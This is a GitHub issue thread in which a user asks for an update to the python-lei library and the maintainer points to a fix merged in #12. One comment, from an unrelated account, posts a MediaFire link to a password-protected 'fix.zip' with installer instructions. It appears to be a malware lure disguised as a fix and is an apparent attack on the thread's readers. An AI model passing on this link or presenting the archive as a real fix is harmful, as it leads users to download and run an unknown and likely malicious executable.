### ISSUE TITLE
Update

### ISSUE THREAD

**Issue by paolovolterra** [jdvala/python-lei#11]
Hi,
could you update it?
THKS
p

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jdvala** [comment]
Hi is something wrong with the library?

**Comment by jdvala** [comment]
The fix regarding the ISIN mapping file is fixed in #12 please update the library.
